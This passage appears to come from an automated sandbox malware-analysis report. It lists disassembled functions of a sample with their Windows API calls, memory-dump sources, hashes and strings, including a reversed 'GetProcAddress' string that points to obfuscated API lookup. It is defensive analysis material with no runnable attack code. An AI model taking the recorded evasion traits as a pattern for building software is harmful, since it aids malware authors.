                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C9AF71
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                      • String ID:
                                                                      • API String ID: 185507032-0
                                                                      • Opcode ID: 12129959bcc1dc0b97a0fe5c91ebe75dbc3e59b9e384a61f705ba4d3496e071c
                                                                      • Instruction ID: 7467cc7379dfef9c827ea8b31da038c181df366931e79f2a5378d68ae91558f8
                                                                      • Opcode Fuzzy Hash: 12129959bcc1dc0b97a0fe5c91ebe75dbc3e59b9e384a61f705ba4d3496e071c
                                                                      • Instruction Fuzzy Hash: 411179B2548200BEDB00FBA4CC89F9B77EDAB45700F504A25B754D71E0DA72E9449B62
                                                                      Function 02D520EC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 02D52279
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D52295
                                                                      • __allrem.LIBCMT ref: 02D522AC
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D522CA
                                                                      • __allrem.LIBCMT ref: 02D522E1
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D522FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                      • Instruction ID: 2ce8e9df21197294be05e337de3327e544cb7ea0d6fd4af3cddc39d38c2b6de9
                                                                      • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                      • Instruction Fuzzy Hash: EB81F776A00B269BEF249A68CC45B6B73EAEF40364F14452EED51D6780E7F0ED04CB60
                                                                      Function 02D5AE69 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                                      • Instruction ID: 98611ed97f72408b88f77400e422d72d6f48380bf0bf285dbc1ab658a8c5a744
                                                                      • Opcode Fuzzy Hash: 6cafc8de57892fd614af7c3accbdcbc7a01b4784fb7c252a1c394b1424185e80
                                                                      • Instruction Fuzzy Hash: 05517077504231ABDF24AF68D840BBAB7A5DF46354F24425AFD459B380EBB19D01C770
                                                                      Function 02D5CF0A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe
                                                                      • String ID:
                                                                      • API String ID: 4189289331-0
                                                                      • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                      • Instruction ID: cb6eec04f7e851df96c081e57dc14d7b70cc5e33e0e62525ad0ae92b819f02ef
                                                                      • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                      • Instruction Fuzzy Hash: 0A51F772905325ABDF20AB6C8C41FAE77AADF49324F20421AEC19D63C1DBB1DD41CA74
                                                                      Function 02C9E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E625
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E641
                                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C9E67A
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E6F7
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C9E710
                                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02C9E745
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                      • String ID:
                                                                      • API String ID: 351091851-0
                                                                      • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                      • Instruction ID: 1fb1f776cdab45c163e600218b4b38f5882dbd94568abb80a14a164b596ef220
                                                                      • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                      • Instruction Fuzzy Hash: 5F511A7590162D9BCF22EF58CC88BD9B3BDAF58300F0041D6E609E7201DA30AF819FA1
                                                                      Function 02D18DFA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02D4BD91: __onexit.LIBCMT ref: 02D4BD97
                                                                      • __Init_thread_footer.LIBCMT ref: 02D18E4E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Init_thread_footer__onexit
                                                                      • String ID: PkG$XMG$NG$NG
                                                                      • API String ID: 1881088180-3151166067
                                                                      • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                      • Instruction ID: baf45747f6863521c29a03938615187fac8e654752a9323ba2c20d5912a2dbd2
                                                                      • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                      • Instruction Fuzzy Hash: 2A4193315042506BD324EB24F8A4AEE73ABEB85310F50452AE54A967E0DF305D4ACF2A
                                                                      Function 02D59DE1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                      • Instruction ID: f4b3bb21abca6d0a5aaf3ecd5d92e01df63d111c254a86b56921cab00b633d8c
                                                                      • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                      • Instruction Fuzzy Hash: 4D41FA71900714EFDB249F78CD50BAABBE9EB88710F10856AE955DB380D7B59D018BD0
                                                                      Function 02C93598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935BA
                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935ED
                                                                      • RegCloseKey.ADVAPI32(?,02C93610,00000000,?,00000004,00000000,02C93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C93603
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                      • API String ID: 3677997916-4173385793
                                                                      • Opcode ID: fb50d0b5ff686b76f7fc6850958b100a27809e33336bb07ceb666b85cb4ff86f
                                                                      • Instruction ID: d88b4d7f1c526ea8c01c03c4dd263e372a393f9a37437419856c1b5b68710c6c
                                                                      • Opcode Fuzzy Hash: fb50d0b5ff686b76f7fc6850958b100a27809e33336bb07ceb666b85cb4ff86f
                                                                      • Instruction Fuzzy Hash: 1B01B575944698BAEF11DBD09D06BBD77ECE708B00F5005A1BA04D7680E7B4A610DA59
                                                                      Function 02CA8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                      • API String ID: 667068680-1372893251
                                                                      • Opcode ID: 8cd103a011c5d1248d703ae1422ab44abc6590a2708e93efcdc11d423b94d26b
                                                                      • Instruction ID: 369e1f8d0909a81dc5b9b64a50ff3743e75560e0b09a5c0668529f8807392938
                                                                      • Opcode Fuzzy Hash: 8cd103a011c5d1248d703ae1422ab44abc6590a2708e93efcdc11d423b94d26b
                                                                      • Instruction Fuzzy Hash: 68014BB5680309BFEB14EBA4EC55E9EB7EEFB48B04F514460B805D7B50DA70AE01DA24
                                                                      Function 02D5C30C Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                      • Instruction ID: 39fb2e88978957efa40f6490c34661459651a09ef52a0351281f530e318d10e8
                                                                      • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                      • Instruction Fuzzy Hash: 2951CD31A10728ABDF209F69C881B6A77F5EF49724F10456AEC4AD7350E7B5ED40CB50
                                                                      Function 02D5B429 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                      • Instruction ID: caeddcab40c36478fe8401a7cb1a01fa6ad3c9ea82122897e42449cdeae45e08
                                                                      • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                      • Instruction Fuzzy Hash: ED41D136A002149FCF24DFB8C884A6DB7B6EF84718F1585AAE915EB354DB71ED01CB90
                                                                      Function 02D51E4A Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __dosmaperr$_free
                                                                      • String ID:
                                                                      • API String ID: 242264518-0
                                                                      • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                      • Instruction ID: 378c99d4ea8789d0e3b7a380205fc595e8f344678926cc366e26dba1508f2780
                                                                      • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                      • Instruction Fuzzy Hash: 56315C7240426AFFDF11AFA4CC44AAE7B69EF05365F104269FD28562A0DBB1CD10CB61
                                                                      Function 02D5196A Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02D51986
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02D5199F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 1426506684-0
                                                                      • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                      • Instruction ID: c810af6a45df6ea2d27e425eddf6a4090c90c30223b4e27d46cb1dcc4790723a
                                                                      • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                      • Instruction Fuzzy Hash: 7D01D8331093716EAE1427B8AC84766274AFB067B5B20433AED2C417F0EFD1CC84C968
                                                                      Function 02C9AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C9AAE7,?,?,00000000), ref: 02C9AA68
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C9AAE7,?,?,00000000), ref: 02C9AA98
                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02C9AAA3
                                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C9AAE7,?,?,00000000), ref: 02C9AAC1
                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02C9AACC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                                      • String ID:
                                                                      • API String ID: 4102113445-0
                                                                      • Opcode ID: 795f9baee7e2dd15381776190d845852933b8759d6e0412b374d98308ba3b029
                                                                      • Instruction ID: e44dd32abcbbf7b32097a7df14e8364996c2799efd1505e9a5eb168efcb6e13e
                                                                      • Opcode Fuzzy Hash: 795f9baee7e2dd15381776190d845852933b8759d6e0412b374d98308ba3b029
                                                                      • Instruction Fuzzy Hash: 6901A2B52802447FFE11AA74CD1DB6A776DDB86710F620570F400A66C0DA759E00AA68
                                                                      Function 02D67FCC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                      • Instruction ID: d0d8ba9ab7cbf69f2e56b785eea879a5d1c1526ddab7fa38f4b79ea5921d2af6
                                                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                      • Instruction Fuzzy Hash: 1AF0FF325043246B8B30EB5CE885E2A77DAEA09754BE4891AE548DB750DB71FC80CA74
                                                                      Function 02D20145 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 328COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
